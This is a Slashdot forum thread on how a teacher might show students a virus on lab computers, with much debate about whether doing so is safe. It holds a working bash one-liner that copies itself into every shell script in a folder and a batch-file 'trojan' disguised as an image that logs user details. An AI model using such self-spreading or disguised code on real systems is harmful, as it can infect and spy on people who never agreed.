It is meant to be a joke but it has many of the properties of a "real" virus. - social engineering - exploits a system's weakness - can be tailored to have numerous side effects - propagation/growth It has the benefit of being easy to remove and being practically impossible to constitute a fire able offence. So, here it is in its entirety (I have modified it slightly as the original had a bug (deleted all files before forwarding ;-)... You have just received the ' Virus' As we ain't got no programming experience, this virus works on the honor system. Please forward this virus to everyone on your mailing list. When that is completed delete all files from your hard disk. Thank you for your cooperation. School of hard knocks. Computer Engineering Dept.

Re:Simple

[JasperHW]

That's weird, I manage 1000 workstations (600/400 PC vs Mac), 10 X Servs (as they're generally called), 20 Linux (RHEL), and 100 windows. Macs, hands down, are the single biggest use of my help desk techs and network admins time. We've even had about 20-30 people switch from windows to mac because its "what they prefer." Typically, that lasts less than a week before they come crying back for a PC (though to be fair, one stayed). If I could get rid of all of the workstations (since as far as I've seen there is *nothing* they can do that a PC can't), my expenses would DROP. So I guess my anecdotal experience of Macs as the WWOS counteracts yours.

hard to find these days..

[spiffmastercow]

True viruses are few and far between in this day and age. A true virus must a.) be able to attach itself to any other executable, and b.) propagate itself to other executables. Most malware these days is spread using a trojan as an attack vector. The closest to a real virus that you're likely to find is the occasional worm that replicates via a remote exploit, but those are also fairly uncommon these days.

Virus?

[iONiUM]

Ebola. That'll teach 'em.

VirtualBox and a virus creation tool

[cHALiTO]

Well, for starters, I'd install virtualbox and do all the work on a fresh install of windows running on it. Then you can take your pick of virus. I guess a very small non destructive old one would be best, especially if the source code is available (though that might be overkill if you just want them to get an idea of how virus work..)
I was thinking of the 'stoned' virus.. then I remembered there was an app back in the day, for DOS, that would let you create your own virus.. you'd select some options like stealth capabilities, file or disk deletion, printing a message, etc. Then the program would generate a virus, both in compiled .com and asm source code.
It was called NuKE, but I'm sure there's more like that one.

here's a link from google (I couldn't verify it since my work's proxy is blocking the site):

This is a very old app, so I'm not sure it'll work on winXP or newer OSs but it might be worth a try.

Good luck!

Tell them to bring their parent's memory sticks

[kikito]

Chances are that 20% of them are infected with some crap. Just use an antivirus on them. Maybe (if it is a free antivirus) copy the antivirus installer on them, so they can bring it home.

Here's an easy one

[FauxPasIII]

Reasonably safe, gets the point across:

#!/bin/bash
for file in *.sh ; do if ! grep -q fo0z $file ; then grep fo0z $0 >> $file ; fi ; done

Comments

[edp]

As others have noted, spreading a virus and teaching others to spread a virus is dangerous, even if the virus is "benign." If the virus spreads to the system of any person who did not consent, you have committed an unethical and possibly unlawful act.

That said, it is necessary to learn and to teach. If you have responsible students who have agreed to take proper precautions, it may be permissible to perform certain exercises with viruses. However, while you can get ideas from Slashdot, you should not accept advice. You should verify the ideas independently with professionals in computer security.

I am not one, but one idea is to take some ideas from the methods used to prevent biological organisms from spreading while experimenting on those. For example, design the virus to spread only to systems that contain a special marker, such as a file in a known location that contains the text "This system is part of the equipment for course 123 in the Fall 2012 semester." This would prevent the virus from spreading to other systems even if a network connection were made or somebody moved a disk from your isolated systems to a networked system. It would not, of course, stop one of your students from disabling that part of the virus and making themselves a fun "toy" to play with, which is why you need to ensure your students are trustworthy.

Re:How about...

Er, did you even read the damn post?

Here, let me help you out with the first four fucking words:

Currently I am teaching...

Hi!
I'm from AT&T! Can you please let me in to check the wires?

They probably already know...

[rgallagher01]

Just have your students surf on the computers without A/V for about 15-20 minutes, guaranteed that they will all be infected. Then just do a little research and have them run some malware removal programs, have them go through the registry and see if they can find the specific keys that they were told the viruses created when they were doing the research on what they had become infected with. Most of the students are probably experienced with viruses and that most of them are really just programs that stupid people install.

Pirate Windows XP

[DarthVain]

Pirate Windows XP. Connect to internet over night. Unplug in morning. Done. Have fun.

P.S. Kids might want to take a sex ed class first for all the pop ups that are sure to come.

As for how to fix. Format hard drive. Install new OS. Done. Reconnect to Internet.

Can also be instructive as to why not to Pirate OS (or at least not XP).

Re:Simple

[after.fallout.34t98e]

That might not mean your mac systems are worse, just that the users of them are more noisy. 10% of our users are using OSX, but 60% of the complaints in company come from them. I (am not in the IT dept) personally know of dozens of problems in the windows side that are never reported; these users sit there and pretend the problem isn't there. These are common issues too, like accidentally deleting a folder on the start menu, so that the only way they can run a program is from their desktop, or losing the formatting toolbar in word 2003 and not knowing how to put it back (one particular user has 2 documents open at all times, one that she copies text from and the one she is working on; whenever she needs to bold text or put in a title, she copies and pastes it from the old document; she wouldn't know how to create some formatting that wasn't already in a document she has somewhere). These people will just sit it out until the next upgrade cycle. That is when they get a "new" computer which IT reset to company settings.

We aren't talking about computer savvy people here, we are talking about the general workforce over 30 right now. In my experience the difference between the windows users and the mac users are that the mac users complain more. The users have just as many problems on macs as they do on windows, but the mac users tend not to put up with it.

Teach exploits not exploiters

[SWiTlik]

Don't teach how to remove viruses. That is a moving target. Teach how viruses spread though specific examples. I think cross site scripting (XSS) is easy to teach them once they've done a little html authoring and had a little javascript programming. For this socially networked generation it applies to stuff they use EVERY hour of every day. A few of there were probably hit by that mouseover twitter exploit a few weeks ago. You can run an intentionally vulnerable server such as mutillidae to practice the exploits. http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10 Read up on current exploits at http://owasp.org/ The future needs people to know how to not create exploits, and patch the ones they do. We don't need more IT "next clickers" who only know how to run third party solutions.

Why not Sony Rootkit

[Nethemas+the+Great]

Find any one of these and you'll have a few good lessons you can teach your students...

Small program

[alxcsby]

I made a "Trojan" for an office training program that is pretty simple. You can choose your method of transmission, I used an email with a funny attachment. It was FunnyPicture.exe, masked with the jpg.ico file. The FunnyPicture.exe file was just a bat file that I converted to an exe so I could use the different icon. The bat file was this: echo %username% %computername% >> "LOCATION\OF\TEXT\FILE\TO\STORE\USER\INFORMATION" Just replace the string in quotes with the location of a networked text file. You can modify this to do more, or write a basic script to pull up a picture. I had it feed them an image of a BSOD as a power point show. It was good simulation with no real damage, and got across the point how easy it is to lose critical data to a single thoughtless click. Best of luck, A.

Wow that brings back memories!

[DRAGONWEEZEL]

Good times indeed!

Yeah...

... it's called Windows ! ;) =D

Don't copy that floppy

Virus to destroy the boot sector of a floppy perhaps.

Re:Simple

[Coren22]

Um, there are plenty of Mac viruses out there. Grow up, you really are acting like a 13 year old. I manage many Mac workstations too, and I have had to clean up enough infections because smug people like you try to say Mac is immune when it isn't, it is irrelevant. In a recent hacking contest between Linux, Windows 7 and Mac, the Mac fell first. So you managing 100 Mac workstations, 10 Mac servers, 50 Linux servers and 4 Windows boxes and pointing out how your Windows boxes cause more issues just shows your incompetence as a sys admin.

Re:DON'T DO IT! You'll get fired

[xiang+shui]

It does NOT pop up a message box, it's not executable code. It doesn't propagate. It's not a virus, simply a string of text that is recognized as one by every major AV software.

Re:DON'T DO IT! You'll get fired

[xiang+shui]

Sorry to reply to my own post, but what I originally intended to point out was that it cannot be called from a batch file, as it's not executable.

Use the Define virus

[Fuzzums]

it's only 30 bytes big and infects .com files in the curent directory only.

you can even make a virus scanner for it.

make a com file that only does RET (a one byte assembly statement)
if the file gets infected, it grows.

network.vbs

from circa march 2000: http://viruses17.blogspot.com/2008/07/vbscript-worm.html

Re:DON'T DO IT! You'll get fired

[Hegh]

Umm... It IS executable. It prints "EICAR-STANDARD-ANTIVIRUS-TEST-FILE!" to the console when run as a COM program. It's just been added to the virus definitions of every piece of antivirus software to allow for simple, risk-free testing.

Eicar. The test virus.

[AG+the+other]

www.eicar.org/anti_virus_test_file.htm

Eicar is a test virus. It's made precisely for what you want. However the last time I tried to download it my AV program detected it and blocked the download.

AG

Re:DON'T DO IT! You'll get fired

[xiang+shui]

Oops, my bad. Thanks for the info!

Re:

[BlueRaja]

If you have to ask, you clearly should not be doing this. I would say the same thing to a chemistry teacher asking what explosives to show her students.

Now that is a BAD idea....

[niftymitch]

Better to teach quality programming. Programs that defend themselves from buffer overflow and other stupid user tricks. A virus is not a school project and if it escapes you could end up in hot water. There is a phrase that yacht salesmen have. "If you have to ask the price you cannot afford it". If you have to ask where and what to get in the context of a virus ... you are not well enough equipped to teach the class. Better to teach quality defensive programming.

Simple stuff

[hdsink]

I got tired of reading everyone's responses because I remember several instances where a simple line of missing code would cause havoc on anyone's computer back when we moved up from Commodore 64s. The not so obvious line of MOUSEINDOSBOX that would be missing would cause the mouse to not work back before DOS was loaded separately from Windows. Then there's the one when CD's came out that caused the CD from staying closed. Now I'm not a computer programmer by any means, but when Windows 98 became passe I gave up on trying to keep track on every file on my computer. Yes, I was one of those who would print out every file on my computer so that when I would install something new, I would know if something went wrong or not. There are all sorts of "simple" programs out there than can just be a nuisance on one's computer. Do you remember the one that would log you off if you were clicking your mouse too fast? The pop up stuff is a classic that most of us remember when the internet came about. The multiple browsers opening while you would be pressing on ALT+F4 consistently. That was a pain. Good luck with it.

1 oh 1

[DynaSoar]

"I am looking for a virus with which I can infect the lab computers (only connected to local network, no outside network connection) that would be easy for the students to remove by hand. Can the Slashdot community point me in any directions?"

Yes. Teach them some useful Computer 101 stuff instead of wasting time on stuff that makes the computers useless. If you must cover the subject let them read http://en.wikipedia.org/wiki/Robert_Tappan_Morris Before you infect any machines, you should too.

Tobacco Mosaic was the first discovered...

[John+Hasler]

...and is simple. Vacinnia is popular for research. ...Oh. That kind of "virus". Never mind.

Try this one

http://archive.cert.uni-stuttgart.de/bugtraq/2003/06/msg00251.html
Plays around with the EICAR test program. Not sure if the AV programs still have the same problems or if they even exist.

Eicar

[stasike]

Look up the Eicar test virus.
It is not a virus as such, just a text string you can create by a text editor, but all antivirus programs react to this and it is fun to see how antivirus reacts to your attempts to save file, unpack an archive or send email.

Old Primary School Days

[Slayer+Silver+Wolf]

Back in the old days of primary school we had labs full of macs. One day my friends and I discovered you could record your voice on them or other things and set that as the warning sound replacing the standard beep. After recording ourselves saying our favorite non rude south park quotes we set them as the alert tone and went to lunch. The next day during our computer lesson the IT teacher told us off saying that after lunch the previous day she had the kindegarten kids in who love to button mash getting very freaked out as their computers told them off in a number of differen't ways.

Ah! The good old days!

I remember when I was in high school in the 90's. I got hold of a copy and reverse engineering the junkie virus. I had no internet back in those days and had to figure out for myself what XOR instruction does to actually get the raw machine code. It was great fun!

I then submitted my findings for a totally unrelated IT assignment and got a C just because I think the teacher feared me a little after that.

The most awesome thing happened though later that year, around assessment time, the school got infected with an astounding number of viruses that took down the network and caused our end of semester results to be delayed by a few weeks. I could only attribute that to the fact that I had gotten a bit obsessive after the fun I'd had with junkie and used the schools internet to collect as many viruses from virus development sites as I could find. I stored them in a folder called "Warning Viruses - Do not run". I can only assume one of the network admins started clicking through them for a while until the schools lame virus scanner finally kicked in and detected one of them because that folder disappeared about the same time and no one questioned me about it.